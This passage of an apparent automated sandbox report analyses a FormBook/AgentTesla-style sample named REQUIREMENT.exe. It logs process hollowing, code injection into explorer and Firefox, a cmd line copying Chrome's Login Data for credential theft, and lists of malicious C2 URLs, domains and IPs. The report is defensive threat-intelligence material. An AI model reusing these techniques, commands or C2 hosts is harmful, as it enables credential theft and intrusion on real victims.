Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1D4A0 mov eax, dword ptr fs:[00000030h]	3_2_1EA1D4A0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1D4A0 mov eax, dword ptr fs:[00000030h]	3_2_1EA1D4A0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CB490 mov eax, dword ptr fs:[00000030h]	3_2_1E9CB490
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CB490 mov eax, dword ptr fs:[00000030h]	3_2_1E9CB490
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA454B0 mov eax, dword ptr fs:[00000030h]	3_2_1EA454B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA454B0 mov ecx, dword ptr fs:[00000030h]	3_2_1EA454B0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_1E9BF4D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B14C9 mov eax, dword ptr fs:[00000030h]	3_2_1E9B14C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B14C9 mov eax, dword ptr fs:[00000030h]	3_2_1E9B14C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B14C9 mov eax, dword ptr fs:[00000030h]	3_2_1E9B14C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B14C9 mov eax, dword ptr fs:[00000030h]	3_2_1E9B14C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B14C9 mov eax, dword ptr fs:[00000030h]	3_2_1E9B14C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4F4FD mov eax, dword ptr fs:[00000030h]	3_2_1EA4F4FD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B94FA mov eax, dword ptr fs:[00000030h]	3_2_1E9B94FA

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Code function: 3_2_1E9D34E0 NtCreateMutant,LdrInitializeThunk,

3_2_1E9D34E0

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BBBCC RtlAddVectoredExceptionHandler,		1_2_023BBBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CBBCC RtlAddVectoredExceptionHandler,		25_2_022CBBCC

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: certmgr3ff.exe.9.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 47.88.32.85 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.101.245.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.73.226.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.67.72.176 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.64.116.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.139.41 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.164.172.49 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.239.224.4 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.186.179 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.77.52.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 204.141.43.204 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.150.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.121.211.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.101.192.119 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.215.231.81 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 137.117.17.70 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.59.144.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.130.148 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.191 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.189.108.75 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.195.206.5 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 5F0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\systray.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7F0C20000

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\SysWOW64\systray.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF7F0C20000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Thread register set: target process: 680			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 680			Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process created: C:\Users\user\Desktop\REQUIREMENT.exe 'C:\Users\user\Desktop\REQUIREMENT.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior

Source: explorer.exe, 00000009.00000000.32964367493.0000000004F80000.00000004.00000001.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.32958790326.00000000018C0000.00000002.00020000.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.32908381925.0000000001167000.00000004.00000020.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000009.00000000.32958790326.00000000018C0000.00000002.00020000.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.32958790326.00000000018C0000.00000002.00020000.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Program Manager6f

Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: REQUIREMENT.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: systray.exe PID: 2092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: certmgr3ff.exe PID: 2676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: certmgr3ff.exe PID: 6616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: certmgr3ff.exe PID: 4776, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\systray.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Registry Run Keys / Startup Folder1	Process Injection712	Virtualization/Sandbox Evasion22	OS Credential Dumping1	Security Software Discovery421	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	DLL Side-Loading1	Registry Run Keys / Startup Folder1	Process Injection712	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	System Information Discovery4	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
REQUIREMENT.exe	49%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Aidr0p8lx\certmgr3ff.exe	49%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cacaolixir.com	0%	Virustotal		Browse
centralcontable.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.high-clicks.com/cogu/	0%	Avira URL Cloud	safe
http://www.xn--4pvw92bcry.com/cogu/	0%	Avira URL Cloud	safe
http://www.tpmionline.com/cogu/	0%	Avira URL Cloud	safe
http://www.cinargeridonusum.com/cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF	0%	Avira URL Cloud	safe
http://www.thousandoaks-buickgmc.com/cogu/L	0%	Avira URL Cloud	safe
http://www.jkwhitleyphotography.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2	0%	Avira URL Cloud	safe
http://www.thousandoaks-buickgmc.com/cogu/W	0%	Avira URL Cloud	safe
http://www.domainair.biz/cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.cacaolixir.com/cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.estudio-me.com/cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi	0%	Avira URL Cloud	safe
http://www.shopsharpgraphics.com/cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.searchvity.com/?dn=	0%	Avira URL Cloud	safe
http://www.thousandoaks-buickgmc.com/cogu/6	0%	Avira URL Cloud	safe
http://www.tpmionline.com/cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
https://word.office.comcaS	0%	Avira URL Cloud	safe
http://www.taichan.xyz/cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	0%	Avira URL Cloud	safe
http://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP	0%	Avira URL Cloud	safe
http://www.boliden-ab.com/cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP	0%	Avira URL Cloud	safe
http://www.uprisehealthmonitoring.com/cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi	0%	Avira URL Cloud	safe
http://www.marvellouslles.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F	0%	Avira URL Cloud	safe
http://www.thousandoaks-buickgmc.com/cogu/	0%	Avira URL Cloud	safe
http://www.shopsharpgraphics.com/cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi	0%	Avira URL Cloud	safe
http://www.searchvity.com/	0%	Avira URL Cloud	safe
http://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF	0%	Avira URL Cloud	safe
http://www.nu12.online/cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF	0%	Avira URL Cloud	safe
http://www.xn--4pvw92bcry.com/cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP	0%	Avira URL Cloud	safe
http://www.ceruleden.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr	0%	Avira URL Cloud	safe
http://www.hkautobox.com/cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.shopsharpgraphics.com	0%	Avira URL Cloud	safe
http://www.cinargeridonusum.com/cogu/	0%	Avira URL Cloud	safe
www.tpmionline.com/cogu/	0%	Avira URL Cloud	safe
http://www.cacaolixir.com/cogu/	0%	Avira URL Cloud	safe
http://www.shopsharpgraphics.com/cogu/	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.nazfoodstuff.com/cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.nu12.online/cogu/	0%	Avira URL Cloud	safe
http://www.soymilk-design.com/cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.bqgfk.com/cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.domainair.biz/cogu/	0%	Avira URL Cloud	safe
http://www.high-clicks.com/cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.researchlearningspirit.xyz/cogu/	0%	Avira URL Cloud	safe
http://www.fishermandm.com/cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.fishermandm.com/cogu/	0%	Avira URL Cloud	safe
http://www.xn--4pvw92bcry.com/cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF	0%	Avira URL Cloud	safe
http://www.nazfoodstuff.com/cogu/	0%	Avira URL Cloud	safe
http://www.alo360.net/cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF	0%	Avira URL Cloud	safe
http://www.alexanderorlandis.com/cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi	0%	Avira URL Cloud	safe
http://www.bestofnapa.guide/cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC	0%	Avira URL Cloud	safe
http://www.jachaljuega.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ	0%	Avira URL Cloud	safe
http://www.i8news-de.website/cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.xn--4pvw92bcry.com	75.2.115.196	true	true		unknown
bestofnapa.guide	34.102.136.180	true	false		unknown
docs.google.com	172.217.168.78	true	false		high
www.ceruleden.com	47.88.32.85	true	true		unknown
www.bqgfk.com	154.195.206.5	true	true		unknown
parkingpage.namecheap.com	198.54.117.210	true	false		high
cacaolixir.com	34.102.136.180	true	false	0%, Virustotal, Browse	unknown
alexanderorlandis.com	156.67.72.176	true	true		unknown
centralcontable.net	198.59.144.16	true	true	0%, Virustotal, Browse	unknown
www.mobileiranian2.com	185.73.226.109	true	true		unknown
taichan.xyz	103.164.172.49	true	true		unknown
drive.google.com	172.217.168.46	true	false		high
www.fishermandm.com	66.96.130.148	true	true		unknown
estudio-me.com	192.0.78.25	true	true		unknown
www.nu12.online	91.195.240.94	true	true		unknown
www.i8news-de.website	3.121.211.190	true	true		unknown
a402f69f12f4a8640.awsglobalaccelerator.com	15.197.150.5	true	true		unknown
www.thousandoaks-buickgmc.com	199.101.245.90	true	true		unknown
www.alo360.net	156.239.224.4	true	true		unknown
zhs.zohosites.com	204.141.43.204	true	false		high
www.soymilk-design.com	151.101.192.119	true	true		unknown
tpmionline.com	216.189.108.75	true	true		unknown
www.shopsharpgraphics.com	199.34.228.191	true	true		unknown
www.cinargeridonusum.com	154.215.231.81	true	true		unknown
hkautobox.com	51.77.52.109	true	true		unknown
www.researchlearningspirit.xyz	172.67.139.41	true	true		unknown
googlehosted.l.googleusercontent.com	142.250.185.161	true	false		high
ghs.googlehosted.com	142.250.186.179	true	false		unknown
www.uprisehealthmonitoring.com	137.117.17.70	true	true		unknown
www.high-clicks.com	192.64.116.180	true	true		unknown
www.nazfoodstuff.com	unknown	unknown	true		unknown
www.domainair.biz	unknown	unknown	true		unknown
www.6ohmf.info	unknown	unknown	true		unknown
clients.config.office.net	unknown	unknown	false		high
www.estudio-me.com	unknown	unknown	true		unknown
www.bestofnapa.guide	unknown	unknown	true		unknown
www.boliden-ab.com	unknown	unknown	true		unknown
doc-04-7g-docs.googleusercontent.com	unknown	unknown	false		high
www.alexanderorlandis.com	unknown	unknown	true		unknown
www.marvellouslles.com	unknown	unknown	true		unknown
doc-0o-60-docs.googleusercontent.com	unknown	unknown	false		high
www.centralcontable.net	unknown	unknown	true		unknown
www.originial-motors.com	unknown	unknown	true		unknown
www.sanchalanprokashon.com	unknown	unknown	true		unknown
www.hkautobox.com	unknown	unknown	true		unknown
www.jkwhitleyphotography.com	unknown	unknown	true		unknown
www.cacaolixir.com	unknown	unknown	true		unknown
www.yakyu-eiga.com	unknown	unknown	true		unknown
www.tpmionline.com	unknown	unknown	true		unknown
www.taichan.xyz	unknown	unknown	true		unknown
www.jachaljuega.com	unknown	unknown	true		unknown
www.ebbtidefloodtide.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.high-clicks.com/cogu/	true	Avira URL Cloud: safe	unknown
